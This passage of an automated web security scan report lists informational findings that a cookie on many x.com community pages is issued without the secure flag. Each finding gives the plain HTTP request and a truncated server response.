GET /community/ppx/xspaces/cloud-computing HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:38 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323131323b31342c323035333b31342c323030373b31342c323035313b31342c323031343b31342c323031313b31342c323030333b31342c323030393b31342c323030383b31342c323031303b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:38 GMT; Path=/
Vary: User-Agent
JP: D=94000 t=1313157038315262
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.67. https://www.x.com/community/ppx/xspaces/digital_goods

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/xspaces/digital_goods

Issue detail

The following cookie was issued by the application and does not have the secure flag set: jive.recentHistory.-1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/xspaces/digital_goods HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:39 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323034383b31342c323035313b31342c323131323b31342c323035333b31342c323030373b31342c323031343b31342c323031313b31342c323030333b31342c323030393b31342c323030383b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:39 GMT; Path=/
Vary: User-Agent
JP: D=155072 t=1313157039623431
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.68. https://www.x.com/community/ppx/xspaces/finance

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/xspaces/finance

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/xspaces/finance HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:40 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323034393b31342c323131323b31342c323034383b31342c323035313b31342c323035333b31342c323030373b31342c323031343b31342c323031313b31342c323030333b31342c323030393b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:40 GMT; Path=/
Vary: User-Agent
JP: D=82568 t=1313157040529050
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.69. https://www.x.com/community/ppx/xspaces/forums

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/xspaces/forums

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/xspaces/forums HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:52 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323038343b31342c323036333b31342c323036323b31342c323035323b31342c323035303b31342c323035373b31342c323036313b31342c323035343b31342c323232343b31342c323236363b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:52 GMT; Path=/
Vary: User-Agent
JP: D=123822 t=1313157052865732
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.70. https://www.x.com/community/ppx/xspaces/gaming

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/xspaces/gaming

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/xspaces/gaming HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:46 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323035303b31342c323036313b31342c323035373b31342c323035343b31342c323232343b31342c323236363b31342c323236383b31342c323034393b31342c323034383b31342c323131323b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:46 GMT; Path=/
Vary: User-Agent
JP: D=82477 t=1313157046859519
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.71. https://www.x.com/community/ppx/xspaces/identity

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/xspaces/identity

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/xspaces/identity HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:41 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323236383b31342c323034393b31342c323034383b31342c323131323b31342c323035313b31342c323035333b31342c323030373b31342c323031343b31342c323031313b31342c323030333b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:41 GMT; Path=/
Vary: User-Agent
JP: D=98694 t=1313157041495583
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.72. https://www.x.com/community/ppx/xspaces/innovate

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/xspaces/innovate

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/xspaces/innovate HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:48 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036323b31342c323035323b31342c323035303b31342c323035373b31342c323036313b31342c323035343b31342c323232343b31342c323236363b31342c323236383b31342c323034393b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:49 GMT; Path=/
Vary: User-Agent
JP: D=172927 t=1313157048855371
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.73. https://www.x.com/community/ppx/xspaces/introduce

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/xspaces/introduce

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/xspaces/introduce?view=documents HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:52 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b31342c323036323b31342c323035323b31342c323035303b31342c323035373b31342c323036313b31342c323035343b31342c323232343b31342c323236363b31342c323236383b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:52 GMT; Path=/
Vary: User-Agent
JP: D=99978 t=1313157052571521
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.74. https://www.x.com/community/ppx/xspaces/mobile

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/xspaces/mobile

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/xspaces/mobile HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:34 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323035313b31342c323030393b31342c323030333b31342c323031313b31342c323030373b31342c323031343b31342c323030383b31342c323031303b31342c323031393b31342c323237363b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:35 GMT; Path=/
Vary: User-Agent
JP: D=93891 t=1313157035030578
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.75. https://www.x.com/community/ppx/xspaces/mobile/mecl

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/xspaces/mobile/mecl

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/xspaces/mobile/mecl HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:44 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323236363b31342c323035343b31342c323232343b31342c323236383b31342c323034393b31342c323034383b31342c323131323b31342c323035313b31342c323035333b31342c323030373b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:44 GMT; Path=/
Vary: User-Agent
JP: D=118072 t=1313157044365221
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.76. https://www.x.com/community/ppx/xspaces/mobile/mobile_ec

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/xspaces/mobile/mobile_ec

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/xspaces/mobile/mobile_ec HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:43 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323232343b31342c323236363b31342c323035343b31342c323236383b31342c323034393b31342c323034383b31342c323131323b31342c323035313b31342c323035333b31342c323030373b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:44 GMT; Path=/
Vary: User-Agent
JP: D=244511 t=1313157043858374
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.77. https://www.x.com/community/ppx/xspaces/security

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/xspaces/security

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/xspaces/security HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:55 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323236393b31342c323232313b31342c323235313b31342c323130303b31342c323038343b31342c323036333b31342c323036323b31342c323035323b31342c323035303b31342c323035373b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:55 GMT; Path=/
Vary: User-Agent
JP: D=117938 t=1313157055856107
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.78. https://www.x.com/community/ppx/xspaces/social

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/xspaces/social

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/xspaces/social HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:47 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323035323b31342c323035303b31342c323036313b31342c323035373b31342c323035343b31342c323232343b31342c323236363b31342c323236383b31342c323034393b31342c323034383b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:47 GMT; Path=/
Vary: User-Agent
JP: D=146095 t=1313157047611313
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.79. https://www.x.com/community/ppx/xspaces/subscriptions

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/xspaces/subscriptions

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/xspaces/subscriptions HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:53 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323232313b31342c323130303b31342c323036333b31342c323038343b31342c323036323b31342c323035323b31342c323035303b31342c323035373b31342c323036313b31342c323035343b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:54 GMT; Path=/
Vary: User-Agent
JP: D=123225 t=1313157053998686
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.80. https://www.x.com/community/ppx/xspaces/toolkits

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/xspaces/toolkits

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/xspaces/toolkits HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:54 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323235313b31342c323232313b31342c323038343b31342c323130303b31342c323036333b31342c323036323b31342c323035323b31342c323035303b31342c323035373b31342c323036313b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:54 GMT; Path=/
Vary: User-Agent
JP: D=92295 t=1313157054626427
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.81. https://www.x.com/community/ppx/xspaces/web_checkout

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/xspaces/web_checkout

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/xspaces/web_checkout HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:42 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323035343b31342c323236383b31342c323034393b31342c323034383b31342c323131323b31342c323035313b31342c323035333b31342c323030373b31342c323031343b31342c323031313b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:43 GMT; Path=/
Vary: User-Agent
JP: D=247512 t=1313157042801714
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.82. https://www.x.com/community/ppx/xspaces/web_checkout/nvp

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/xspaces/web_checkout/nvp

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/xspaces/web_checkout/nvp HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:44 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323035373b31342c323236363b31342c323035343b31342c323232343b31342c323236383b31342c323034393b31342c323034383b31342c323131323b31342c323035313b31342c323035333b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:45 GMT; Path=/
Vary: User-Agent
JP: D=141801 t=1313157044894483
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.83. https://www.x.com/community/ppx/xspaces/web_checkout/soap

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/xspaces/web_checkout/soap

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/xspaces/web_checkout/soap HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:46 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036313b31342c323035373b31342c323232343b31342c323236363b31342c323035343b31342c323236383b31342c323034393b31342c323034383b31342c323131323b31342c323035313b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:46 GMT; Path=/
Vary: User-Agent
JP: D=130212 t=1313157046417943
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.84. https://www.x.com/community/xcommerce-blogs

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/xcommerce-blogs

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/xcommerce-blogs?view=blog HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: https://www.x.com/index.jspa
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: www.x.com
Connection: Keep-Alive
Cookie: JSESSIONID=7FE401956C0FCEA7A6B398FD70CFF9EB.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e25151d; jive.recentHistory.-1=31342c323030383b

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:38:42 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323237363b31342c323030383b; Expires=Sun, 11-Sep-2011 13:38:43 GMT; Path=/
Vary: User-Agent
JP: D=97775 t=1313156323515835
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.85. https://www.x.com/community/xcommerce-blogs/blog/2011/06/07/adobe-to-arm-xcommerce-retailers-with-customer-data-to-help-them-sell-more

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/xcommerce-blogs/blog/2011/06/07/adobe-to-arm-xcommerce-retailers-with-customer-data-to-help-them-sell-more

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/xcommerce-blogs/blog/2011/06/07/adobe-to-arm-xcommerce-retailers-with-customer-data-to-help-them-sell-more HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:27 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323037333b31342c323232363b31342c323030323b31342c323135343b31342c323131353b31342c323131313b31342c323134393b31342c323038363b31342c323038323b31342c323030353b33382c353939353b33382c363039373b33382c363233383b33382c363238353b33382c363030363b33382c363133383b33382c363330313b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:28 GMT; Path=/
Vary: User-Agent
JP: D=114399 t=1313157088244606
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

